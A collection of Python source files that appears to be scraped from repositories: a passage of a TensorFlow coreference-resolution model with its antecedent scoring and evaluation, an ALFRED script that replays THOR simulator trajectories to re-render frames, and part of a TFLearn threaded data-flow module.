    return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
    """Attention distribution over each span's own tokens.

    Tokens outside [start, end] get log(0) = -inf before the softmax, so
    their attention weight is exactly zero.

    Returns:
        [NC, T] per-span attention weights over all document tokens.
    """
    num_words = util.shape(encoded_doc, 0)  # T
    num_c = util.shape(span_starts, 0)  # NC

    # doc_range[i, t] = t, replicated for every candidate span.
    doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1])  # [K, T]
    mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1))  # [K, T]

    with tf.variable_scope("mention_word_attn"):
        # One scalar attention logit per token, shared across spans.
        word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
    mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
    return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
    """Marginal log-likelihood loss over all gold antecedents.

    Non-gold entries get score + log(0) = -inf, so the logsumexp
    marginalizes only over gold antecedents. The loss per span is
    -log( sum_gold p(antecedent) ).

    Args:
        antecedent_scores: [k, max_ant + 1] scores incl. dummy column 0.
        antecedent_labels: [k, max_ant + 1] boolean gold indicators.

    Returns:
        [k] per-span losses.
    """
    gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels))  # [k, max_ant + 1]
    marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1])  # [k]
    log_norm = tf.reduce_logsumexp(antecedent_scores, [1])  # [k]
    return log_norm - marginalized_gold_scores  # [k]
def bucket_distance(self, distances):
    """
    Places the given values (designed for distances) into 10 semi-logscale buckets:
    [0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
    """
    # floor(log2(d)) + 3: maps 5-7 -> 5, 8-15 -> 6, 16-31 -> 7, 32-63 -> 8, 64+ -> 9+.
    logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
    # Distances <= 4 keep their identity bucket; larger ones use the log bucket.
    use_identity = tf.to_int32(distances <= 4)
    combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
    # Clamp into the 10 available buckets.
    return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
    """Compute the expensive pairwise antecedent scores with an FFNN.

    Per (span, antecedent) pair, builds a feature vector out of:
    same-speaker + genre embeddings (if use_metadata), a bucketed
    antecedent-distance embedding (if use_features), and a
    segment-distance embedding (if segment_distance is given); then
    scores the concatenation [target, antecedent, target*antecedent,
    features].

    Args:
        top_span_emb: [k, emb] span representations.
        top_antecedents: [k, c] candidate antecedent indices per span.
        top_antecedent_emb: [k, c, emb] antecedent representations.
        top_antecedent_offsets: [k, c] span-order distance to each antecedent.
        top_span_speaker_ids: [k] speaker id per span.
        genre_emb: genre embedding for the document.
        segment_distance: optional segment-count distances per pair.

    Returns:
        [k, c] slow antecedent scores.
    """
    k = util.shape(top_span_emb, 0)
    c = util.shape(top_antecedents, 1)

    feature_emb_list = []

    if self.config["use_metadata"]:
        top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents)  # [k, c]
        same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids)  # [k, c]
        speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), tf.to_int32(same_speaker))  # [k, c, emb]
        feature_emb_list.append(speaker_pair_emb)
        tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1])  # [k, c, emb]
        feature_emb_list.append(tiled_genre_emb)

    if self.config["use_features"]:
        antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets)  # [k, c]
        antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), antecedent_distance_buckets)  # [k, c]
        feature_emb_list.append(antecedent_distance_emb)

    if segment_distance is not None:
        with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
            segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), segment_distance)  # [k, emb]
        # FIX: the original assigned tf.nn.dropout(segment_distance_emb, ...)
        # to the unrelated name `span_width_emb` and never used it — dead
        # compute that also clobbered that name. Removed: dropout is already
        # applied to the concatenated feature_emb below, matching how the
        # other features are treated. If per-feature dropout was intended,
        # reassign the dropout result to segment_distance_emb instead.
        feature_emb_list.append(segment_distance_emb)

    feature_emb = tf.concat(feature_emb_list, 2)  # [k, c, emb]
    feature_emb = tf.nn.dropout(feature_emb, self.dropout)  # [k, c, emb]

    target_emb = tf.expand_dims(top_span_emb, 1)  # [k, 1, emb]
    similarity_emb = top_antecedent_emb * target_emb  # [k, c, emb]
    target_emb = tf.tile(target_emb, [1, c, 1])  # [k, c, emb]

    pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2)  # [k, c, emb]

    with tf.variable_scope("slow_antecedent_scores"):
        slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout)  # [k, c, 1]
    slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2)  # [k, c]
    return slow_antecedent_scores  # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
    """Cheap bilinear antecedent scores for pruning.

    Projects the source spans, applies dropout to both sides, and takes
    all-pairs dot products.

    Returns:
        [k, k] score of span j as an antecedent of span i.
    """
    with tf.variable_scope("src_projection"):
        source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout)  # [k, emb]
    target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout)  # [k, emb]
    return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True)  # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
    """Flatten a padded [num_sentences, max_len, ...] tensor into
    [num_words, ...], dropping padding positions via the boolean mask.

    Raises:
        ValueError: if emb is not rank 2 or rank 3.
    """
    sentence_count = tf.shape(emb)[0]
    padded_len = tf.shape(emb)[1]
    flat_len = sentence_count * padded_len

    rank = len(emb.get_shape())
    if rank == 2:
        flattened = tf.reshape(emb, [flat_len])
    elif rank == 3:
        flattened = tf.reshape(emb, [flat_len, util.shape(emb, 2)])
    else:
        raise ValueError("Unsupported rank: {}".format(rank))

    flat_mask = tf.reshape(text_len_mask, [flat_len])
    return tf.boolean_mask(flattened, flat_mask)
def get_predicted_antecedents(self, antecedents, antecedent_scores):
    """Pick the highest-scoring antecedent for each span.

    Column 0 of antecedent_scores is the dummy (no antecedent); when it
    wins, the span gets -1, otherwise the winning column is mapped
    through `antecedents` to a span index.
    """
    best = np.argmax(antecedent_scores, axis=1) - 1
    return [-1 if col < 0 else antecedents[row, col]
            for row, col in enumerate(best)]
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
    """Greedily link each span to its predicted antecedent, forming clusters.

    Spans whose prediction is -1 (dummy) start no link. An antecedent seen
    for the first time opens a new cluster; subsequent mentions join the
    antecedent's existing cluster.

    Returns:
        (clusters, mention_to_cluster) where clusters is a list of tuples
        of (start, end) mentions and mention_to_cluster maps each mention
        to its cluster tuple.
    """
    mention_to_cluster_id = {}
    clusters = []
    for span_idx, ant_idx in enumerate(predicted_antecedents):
        if ant_idx < 0:
            continue
        # Antecedents must precede the mention in span order.
        assert span_idx > ant_idx, (span_idx, ant_idx)

        antecedent = (int(top_span_starts[ant_idx]), int(top_span_ends[ant_idx]))
        if antecedent not in mention_to_cluster_id:
            mention_to_cluster_id[antecedent] = len(clusters)
            clusters.append([antecedent])
        cluster_id = mention_to_cluster_id[antecedent]

        mention = (int(top_span_starts[span_idx]), int(top_span_ends[span_idx]))
        clusters[cluster_id].append(mention)
        mention_to_cluster_id[mention] = cluster_id

    clusters = [tuple(members) for members in clusters]
    mention_to_cluster = {m: clusters[cid] for m, cid in mention_to_cluster_id.items()}
    return clusters, mention_to_cluster
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
    """Decode predicted clusters and feed them, with gold, to `evaluator`.

    Returns:
        The predicted clusters (tuples of (start, end) mentions).
    """
    gold_clusters = [tuple(tuple(mention) for mention in cluster) for cluster in gold_clusters]
    mention_to_gold = {mention: cluster
                       for cluster in gold_clusters
                       for mention in cluster}

    predicted_clusters, mention_to_predicted = self.get_predicted_clusters(
        top_span_starts, top_span_ends, predicted_antecedents)

    evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
    return predicted_clusters
def load_eval_data(self):
    """Lazily load and cache the eval set from config["eval_path"].

    Each cached entry is (tensorized_example, raw_json_example), with
    tensorization done in inference mode. No-op when already loaded.

    Fixes: removed a dead `num_words` computation whose result was never
    used, and iterate the file directly instead of materializing
    readlines().
    """
    if self.eval_data is None:
        def load_line(line):
            example = json.loads(line)
            return self.tensorize_example(example, is_training=False), example
        with open(self.config["eval_path"]) as f:
            self.eval_data = [load_line(l) for l in f]
        print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
    """Run coreference evaluation over the cached eval set.

    Args:
        session: TF session with the trained model loaded.
        global_step: unused in this body (kept for caller compatibility).
        official_stdout: forwarded to the official CoNLL scorer.
        keys: optional collection of doc_keys; other documents are skipped.
        eval_mode: when True, also run the official CoNLL scorer over
            config["conll_eval_path"].

    Returns:
        (summary, f): a summary built by util.make_summary and the
        python-evaluator average F1 (a fraction, not a percentage).
    """
    self.load_eval_data()

    coref_predictions = {}
    coref_evaluator = metrics.CorefEvaluator()
    losses = []
    doc_keys = []
    num_evaluated= 0

    for example_num, (tensorized_example, example) in enumerate(self.eval_data):
        # gold_starts/gold_ends are unpacked but unused here.
        _, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
        feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
        # if tensorized_example[0].shape[0] <= 9:
        if keys is not None and example['doc_key'] not in keys:
            # print('Skipping...', example['doc_key'], tensorized_example[0].shape)
            continue
        doc_keys.append(example['doc_key'])
        loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
        # losses.append(session.run(self.loss, feed_dict=feed_dict))
        losses.append(loss)
        predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
        # Score against gold clusters and remember predictions for CoNLL output.
        coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
        if example_num % 10 == 0:
            print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))

    summary_dict = {}
    if eval_mode:
        conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
        average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
        summary_dict["Average F1 (conll)"] = average_f1
        print("Average F1 (conll): {:.2f}%".format(average_f1))

    p,r,f = coref_evaluator.get_prf()
    summary_dict["Average F1 (py)"] = f
    print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
    summary_dict["Average precision (py)"] = p
    print("Average precision (py): {:.2f}%".format(p * 100))
    summary_dict["Average recall (py)"] = r
    print("Average recall (py): {:.2f}%".format(r * 100))

    return util.make_summary(summary_dict), f
|
augment_trajectories.py | import os
import sys
sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
import json
import glob
import os
import constants
import cv2
import shutil
import numpy as np
import argparse
import threading
import time
import copy
import random
from gen.utils.video_util import VideoSaver
from gen.utils.py_util import walklevel
from env.thor_env import ThorEnv
# File names for the per-trajectory input/output JSON.
TRAJ_DATA_JSON_FILENAME = "traj_data.json"
AUGMENTED_TRAJ_DATA_JSON_FILENAME = "augmented_traj_data.json"

# Output sub-folder names inside each trajectory directory.
# NOTE(review): "FORLDER" is a typo, but the name is kept — other modules
# may reference it.
ORIGINAL_IMAGES_FORLDER = "raw_images"
HIGH_RES_IMAGES_FOLDER = "high_res_images"
DEPTH_IMAGES_FOLDER = "depth_images"
INSTANCE_MASKS_FOLDER = "instance_masks"

# THOR player window resolution used for re-rendering.
IMAGE_WIDTH = 300
IMAGE_HEIGHT = 300

# Request every auxiliary frame type from THOR on each step.
render_settings = dict()
render_settings['renderImage'] = True
render_settings['renderDepthImage'] = True
render_settings['renderObjectImage'] = True
render_settings['renderClassImage'] = True

video_saver = VideoSaver()

# Shared failure log; held open for the process lifetime and shared by all
# worker threads (never explicitly closed — flushed at interpreter exit).
fail_log = open("fail_log.txt", "w")
def get_image_index(save_path):
    """Return the number of frames already saved under `save_path`.

    Counts .png and .jpg files separately and returns the larger count,
    which is also the next zero-based frame index to write.
    """
    png_count = len(glob.glob(save_path + '/*.png'))
    jpg_count = len(glob.glob(save_path + '/*.jpg'))
    return max(png_count, jpg_count)
def save_image_with_delays(env, action,
                           save_path, direction=constants.BEFORE):
    """Save several identical "delay" frames around an action.

    The repeat count comes from constants.SAVE_FRAME_BEFORE_AND_AFTER_COUNTS
    for the action name and direction; env.noop() advances the simulator
    between saves without acting.

    Returns:
        The frame index at which saving started.
    """
    first_index = get_image_index(save_path)
    repeat = constants.SAVE_FRAME_BEFORE_AND_AFTER_COUNTS[action['action']][direction]
    for _ in range(repeat):
        save_image(env.last_event, save_path)
        env.noop()
    return first_index
def save_image(event, save_path):
    """Write the RGB, depth, and instance-mask frames of one event.

    Frames are written as %09d.png using the shared next index derived
    from the RGB folder. Depth is rescaled by 255/10000 into uint8
    (NOTE(review): presumably raw depth in [0, 10000] — confirm units).

    Returns:
        The frame index that was written.
    """
    rgb_dir = os.path.join(save_path, HIGH_RES_IMAGES_FOLDER)
    depth_dir = os.path.join(save_path, DEPTH_IMAGES_FOLDER)
    mask_dir = os.path.join(save_path, INSTANCE_MASKS_FOLDER)

    # cv2 expects BGR, so reverse the channel axis.
    rgb_image = event.frame[:, :, ::-1]
    depth_image = (event.depth_frame * (255 / 10000)).astype(np.uint8)
    mask_image = event.instance_segmentation_frame

    # dump images
    im_ind = get_image_index(rgb_dir)
    cv2.imwrite(rgb_dir + '/%09d.png' % im_ind, rgb_image)
    cv2.imwrite(depth_dir + '/%09d.png' % im_ind, depth_image)
    cv2.imwrite(mask_dir + '/%09d.png' % im_ind, mask_image)
    return im_ind
def save_images_in_events(events, root_dir):
    """Save the frames of every event in `events` under `root_dir`."""
    for ev in events:
        save_image(ev, root_dir)
def check_dir(path):
    """Return True when `path` already exists; otherwise create the
    directory and return False."""
    if not os.path.exists(path):
        os.mkdir(path)
        return False
    return True
def clear_and_create_dir(path):
    """Recreate `path` as an empty directory, deleting any previous contents."""
    already_there = os.path.exists(path)
    if already_there:
        shutil.rmtree(path)
    os.mkdir(path)
def augment_traj(env, json_file):
    """Replay one recorded trajectory in THOR and re-save its frames.

    Re-executes the low-level action sequence from `json_file`
    (traj_data.json): writes fresh RGB / depth / instance-mask frames,
    collects dense rewards, and dumps augmented_traj_data.json plus a
    video next to the input file.

    Relies on module globals: `args` (CLI flags), `fail_log`,
    `video_saver`, `render_settings`, and the *_FOLDER constants.

    Raises:
        Exception: when an action replay fails, or (with --smooth_nav and
            --time_delays) when the regenerated frame count differs from
            the original raw_images count.
    """
    # load json data
    with open(json_file) as f:
        traj_data = json.load(f)

    # make directories
    root_dir = json_file.replace(TRAJ_DATA_JSON_FILENAME, "")

    orig_images_dir = os.path.join(root_dir, ORIGINAL_IMAGES_FORLDER)
    high_res_images_dir = os.path.join(root_dir, HIGH_RES_IMAGES_FOLDER)
    depth_images_dir = os.path.join(root_dir, DEPTH_IMAGES_FOLDER)
    instance_masks_dir = os.path.join(root_dir, INSTANCE_MASKS_FOLDER)
    augmented_json_file = os.path.join(root_dir, AUGMENTED_TRAJ_DATA_JSON_FILENAME)

    # fresh images list
    traj_data['images'] = list()

    # Skip trajectories that look already processed: every output folder
    # holds the same number of frames as raw_images.
    # NOTE(review): this compares counts only, not contents — confirm
    # that is an acceptable completeness check.
    if get_image_index(orig_images_dir) == get_image_index(high_res_images_dir) \
            and get_image_index(high_res_images_dir) == get_image_index(depth_images_dir) \
            and get_image_index(depth_images_dir) == get_image_index(instance_masks_dir):
        print("already create: " + orig_images_dir + "\n")
        fail_log.write("already create: " + orig_images_dir + "\n")
        return

    clear_and_create_dir(high_res_images_dir)
    clear_and_create_dir(depth_images_dir)
    clear_and_create_dir(instance_masks_dir)

    # scene setup
    scene_num = traj_data['scene']['scene_num']
    object_poses = traj_data['scene']['object_poses']
    object_toggles = traj_data['scene']['object_toggles']
    dirty_and_empty = traj_data['scene']['dirty_and_empty']

    # reset
    scene_name = 'FloorPlan%d' % scene_num
    env.reset(scene_name)
    env.restore_scene(object_poses, object_toggles, dirty_and_empty)
    print(high_res_images_dir)

    env.step(dict(traj_data['scene']['init_action']))
    # print("Task: %s" % (traj_data['template']['task_desc']))

    # setup task
    env.set_task(traj_data, args, reward_type='dense')
    rewards = []

    for ll_idx, ll_action in enumerate(traj_data['plan']['low_actions']):
        # next cmd under the current hl_action
        cmd = ll_action['api_action']
        hl_action = traj_data['plan']['high_pddl'][ll_action['high_idx']]

        # remove unnecessary keys
        cmd = {k: cmd[k] for k in ['action', 'objectId', 'receptacleObjectId', 'placeStationary', 'forceAction'] if k in cmd}

        # Navigation actions can be replayed as several interpolated
        # sub-steps (--smooth_nav) to produce smoother videos.
        if "MoveAhead" in cmd['action']:
            if args.smooth_nav:
                save_image(env.last_event, root_dir)
                events = env.smooth_move_ahead(cmd, render_settings)
                save_images_in_events(events, root_dir)
                event = events[-1]
            else:
                save_image(env.last_event, root_dir)
                event = env.step(cmd)

        elif "Rotate" in cmd['action']:
            if args.smooth_nav:
                save_image(env.last_event, root_dir)
                events = env.smooth_rotate(cmd, render_settings)
                save_images_in_events(events, root_dir)
                event = events[-1]
            else:
                save_image(env.last_event, root_dir)
                event = env.step(cmd)

        elif "Look" in cmd['action']:
            if args.smooth_nav:
                save_image(env.last_event, root_dir)
                events = env.smooth_look(cmd, render_settings)
                save_images_in_events(events, root_dir)
                event = events[-1]
            else:
                save_image(env.last_event, root_dir)
                event = env.step(cmd)

        # handle the exception for CoolObject tasks where the actual 'CoolObject' action is actually 'CloseObject'
        # TODO: a proper fix for this issue
        elif "CloseObject" in cmd['action'] and \
                "CoolObject" in hl_action['planner_action']['action'] and \
                "OpenObject" in traj_data['plan']['low_actions'][ll_idx + 1]['api_action']['action']:
            if args.time_delays:
                cool_action = hl_action['planner_action']
                save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.BEFORE)
                event = env.step(cmd)
                save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.MIDDLE)
                save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.AFTER)
            else:
                save_image(env.last_event, root_dir)
                event = env.step(cmd)

        else:
            if args.time_delays:
                save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.BEFORE)
                event = env.step(cmd)
                save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.MIDDLE)
                save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.AFTER)
            else:
                save_image(env.last_event, root_dir)
                event = env.step(cmd)

        # update image list: map every frame written during this action to
        # this low-level (and its high-level) index.
        new_img_idx = get_image_index(high_res_images_dir)
        last_img_idx = len(traj_data['images'])
        num_new_images = new_img_idx - last_img_idx
        for j in range(num_new_images):
            traj_data['images'].append({
                'low_idx': ll_idx,
                'high_idx': ll_action['high_idx'],
                'image_name': '%09d.png' % int(last_img_idx + j)
            })

        if not event.metadata['lastActionSuccess']:
            print("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))
            fail_log.write("Replay Failed: %s \n" % (env.last_event.metadata['errorMessage']))
            raise Exception("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))

        reward, _ = env.get_transition_reward()
        rewards.append(reward)

    # save 10 frames in the end as per the training data
    for _ in range(10):
        save_image(env.last_event, root_dir)

    # store color to object type dictionary
    color_to_obj_id_type = {}
    all_objects = env.last_event.metadata['objects']
    for color, object_id in env.last_event.color_to_object_id.items():
        for obj in all_objects:
            if object_id == obj['objectId']:
                color_to_obj_id_type[str(color)] = {
                    'objectID': obj['objectId'],
                    'objectType': obj['objectType']
                }

    augmented_traj_data = copy.deepcopy(traj_data)
    augmented_traj_data['scene']['color_to_object_type'] = color_to_obj_id_type
    augmented_traj_data['task'] = {'rewards': rewards, 'reward_upper_bound': sum(rewards)}

    with open(augmented_json_file, 'w') as aj:
        json.dump(augmented_traj_data, aj, sort_keys=True, indent=4)

    # save video
    images_path = os.path.join(high_res_images_dir, '*.png')
    video_save_path = os.path.join(high_res_images_dir, 'high_res_video.mp4')
    video_saver.save(images_path, video_save_path)

    # check if number of new images is the same as the number of original images
    if args.smooth_nav and args.time_delays:
        orig_img_count = get_image_index(orig_images_dir)
        new_img_count = get_image_index(high_res_images_dir)
        print ("Original Image Count %d, New Image Count %d" % (orig_img_count, new_img_count))
        if orig_img_count != new_img_count:
            print("sequence length doesn't match\n" + high_res_images_dir + "\n")
            fail_log.write("sequence length doesn't match\n" + high_res_images_dir + "\n")
            fail_log.write("Original Image Count %d, New Image Count %d" % (orig_img_count, new_img_count))
            raise Exception("WARNING: the augmented sequence length doesn't match the original")
def run():
    '''
    replay loop

    Worker body: repeatedly pops trajectory json files from the shared
    `traj_list` (guarded by `lock`) and augments each one in its own
    ThorEnv instance. Failures are logged to `fail_log` and the file is
    skipped rather than aborting the worker.
    '''
    # start THOR env
    env = ThorEnv(player_screen_width=IMAGE_WIDTH,
                  player_screen_height=IMAGE_HEIGHT)

    skipped_files = []

    while len(traj_list) > 0:
        # FIX: pop under `with lock` and re-check emptiness inside the
        # critical section. The original checked the length outside the
        # lock (another worker could drain the list in between, making
        # pop() raise IndexError) and used acquire()/release() so an
        # exception from pop() would leave the lock held forever.
        with lock:
            if not traj_list:
                break
            json_file = traj_list.pop()

        print("Augmenting: " + json_file)
        try:
            augment_traj(env, json_file)
        except Exception as e:
            import traceback
            traceback.print_exc()
            print("Error: " + repr(e))
            print("Skipping " + json_file)
            skipped_files.append(json_file)
            fail_log.write(repr(e) + "\n")
            fail_log.write(json_file + "\n")

    env.stop()
    print("Finished.")

    # skipped files
    if len(skipped_files) > 0:
        print("Skipped Files:")
        print(skipped_files)
# Shared work queue (popped by worker threads in run()) and its guard.
traj_list = []
lock = threading.Lock()

# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="data/2.1.0")
parser.add_argument('--split', type=str, default='valid_seen', choices=['train', 'valid_seen', 'valid_unseen'])
parser.add_argument('--smooth_nav', dest='smooth_nav', action='store_true')
parser.add_argument('--time_delays', dest='time_delays', action='store_true')
parser.add_argument('--shuffle', dest='shuffle', action='store_true')
parser.add_argument('--num_threads', type=int, default=1)
parser.add_argument('--reward_config', type=str, default='../models/config/rewards.json')
args = parser.parse_args()

# make a list of all the traj_data json files
# NOTE(review): all three splits are scanned regardless of --split
# (unchanged behavior; --split only restricts the accepted CLI values).
for split in ['train/', 'valid_seen/', 'valid_unseen/']:
    # FIX: join with os.path.join — the original `args.data_path + split`
    # produced a bogus path like "data/2.1.0train/" whenever --data_path
    # (including the default "data/2.1.0") had no trailing slash.
    for dir_name, subdir_list, file_list in walklevel(os.path.join(args.data_path, split), level=2):
        if "trial_" in dir_name:
            json_file = os.path.join(dir_name, TRAJ_DATA_JSON_FILENAME)
            if not os.path.isfile(json_file):
                continue
            traj_list.append(json_file)

# random shuffle
if args.shuffle:
    random.shuffle(traj_list)

# start worker threads, staggered by 1s so THOR instances don't race on startup
threads = []
for n in range(args.num_threads):
    thread = threading.Thread(target=run)
    threads.append(thread)
    thread.start()
    time.sleep(1)
data_flow.py | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
from . import utils
class DataFlow(object):
    """ Data Flow.

    Base class for real-time pre-processing pipelines that stream data
    through worker threads and queues.

    Arguments:
        coord: `Coordinator`. A Tensorflow coordinator.
        num_threads: `int`. Total number of simultaneous threads to process data.
        max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffle.
        continuous: `bool`. If True, when an epoch is over, same data will be
            feeded again.
        ensure_data_order: `bool`. Ensure that data order is keeped when using
            'next' to retrieve data (Processing will be slower).
        dprep_dict: dict. Optional data pre-processing parameter for performing
            real time data pre-processing. Keys must be placeholders and values
            `DataPreprocessing` subclass object.
        daug_dict: dict. Optional data augmentation parameter for performing
            real time data augmentation. Keys must be placeholders and values
            `DataAugmentation` subclass object.
    """

    def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
                 continuous=False, ensure_data_order=False,
                 dprep_dict=None, daug_dict=None):
        self.coord = coord
        self.shuffle = shuffle
        self.continuous = continuous
        self.dprep_dict = dprep_dict
        self.daug_dict = daug_dict
        self.interrupted = False
        # Strict ordering only works with a single worker and a queue of
        # size one, so it overrides the requested parallelism.
        self.num_threads = 1 if ensure_data_order else num_threads
        self.max_queue = 1 if ensure_data_order else max_queue
class FeedDictFlow(DataFlow):
    """ FeedDictFlow.

    Generate a stream of batches from a dataset. It uses two queues, one for
    generating batch of data ids, and the other one to load data and apply pre
    processing. If continuous is `True`, data flow will never ends until `stop`
    is invoked, or `coord` interrupt threads.

    Arguments:
        feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
            as keys and data as values).
        coord: `Coordinator`. A Tensorflow coordinator.
        num_threads: `int`. Total number of simultaneous threads to process data.
        max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffle.
        continuous: `bool`. If True, when an epoch is over, same data will be
            feeded again.
        ensure_data_order: `bool`. Ensure that data order is keeped when using
            'next' to retrieve data (Processing will be slower).
        dprep_dict: dict. Optional data pre-processing parameter for performing
            real time data pre-processing. Keys must be placeholders and values
            `DataPreprocessing` subclass object.
        daug_dict: dict. Optional data augmentation parameter for performing
            real time data augmentation. Keys must be placeholders and values
            `DataAugmentation` subclass object.
        index_array: `list`. An optional list of index to be used instead of
            using the whole dataset indexes (Useful for validation split).
    """

    def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
                 max_queue=32, shuffle=False, continuous=False,
                 ensure_data_order=False, dprep_dict=None, daug_dict=None,
                 index_array=None):
        super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
                                           shuffle, continuous,
                                           ensure_data_order,
                                           dprep_dict,
                                           daug_dict)
        self.feed_dict = feed_dict
        self.batch_size = batch_size
        self.n_samples = len(utils.get_dict_first_element(feed_dict))
        # Queue holding batch ids
        self.batch_ids_queue = queue.Queue(self.max_queue)
        # Queue holding data ready feed dicts
        self.feed_dict_queue = queue.Queue(self.max_queue)
        # Create samples index array
        self.index_array = np.arange(self.n_samples)
        if index_array is not None:
            self.index_array = index_array
            self.n_samples = len(index_array)
        # Create batches
        self.batches = self.make_batches()
        self.reset_batches()
        # Data Recording
        self.data_status = DataFlowStatus(self.batch_size, self.n_samples)

    def next(self, timeout=None):
        """ next.

        Get the next feed dict.

        Returns:
            A TensorFlow feed dict, or 'False' if it has no more data.
        """
        self.data_status.update()
        return self.feed_dict_queue.get(timeout=timeout)

    def start(self, reset_status=True):
        """ start.

        Launch the worker threads and begin filling the queues.

        Arguments:
            reset_status: `bool`. If True, `DataStatus` will be reset.

        Returns:
        """
        # Start to process data and fill queues
        self.clear_queues()
        self.interrupted = False
        # Reset Data Status
        if reset_status:
            self.data_status.reset()
        # Only a single thread needed for batches ids
        bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
        # Multiple threads available for feed batch pre-processing
        fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
                      for i in range(self.num_threads)]
        self.threads = bi_threads + fd_threads
        for t in self.threads:
            t.start()

    def stop(self):
        """ stop.

        Stop the queue from creating more feed_dict.
        """
        # Send stop signal to processing queue: one False sentinel per worker.
        for i in range(self.num_threads):
            self.batch_ids_queue.put(False)
        # Launch a Thread to wait for processing scripts to finish
        threading.Thread(target=self.wait_for_threads).start()

    def reset(self):
        """ reset.

        Reset batch index.
        """
        self.batch_index = -1

    def interrupt(self):
        """Flag the workers to stop and drain both queues."""
        # Send interruption signal to processing queue
        self.interrupted = True
        self.clear_queues()

    def fill_feed_dict_queue(self):
        """Worker loop: turn batch ids into ready-to-use feed dicts."""
        while not self.coord.should_stop() and not self.interrupted:
            batch_ids = self.batch_ids_queue.get()
            # A False sentinel from stop() terminates this worker.
            if batch_ids is False:
                break
            data = self.retrieve_data(batch_ids)
            # Apply augmentation according to daug dict
            if self.daug_dict:
                for k in self.daug_dict:
                    data[k] = self.daug_dict[k].apply(data[k])
            # Apply preprocessing according to dprep dict
            if self.dprep_dict:
                for k in self.dprep_dict:
                    data[k] = self.dprep_dict[k].apply(data[k])
            #all prepped, put the data into the queue
            self.feed_dict_queue.put(data)

    def fill_batch_ids_queue(self):
        """Producer loop: push successive batch id arrays to the id queue."""
        while not self.coord.should_stop() and not self.interrupted:
            ids = self.next_batch_ids()
            # next_batch_ids returns False when the (non-continuous) epoch ends.
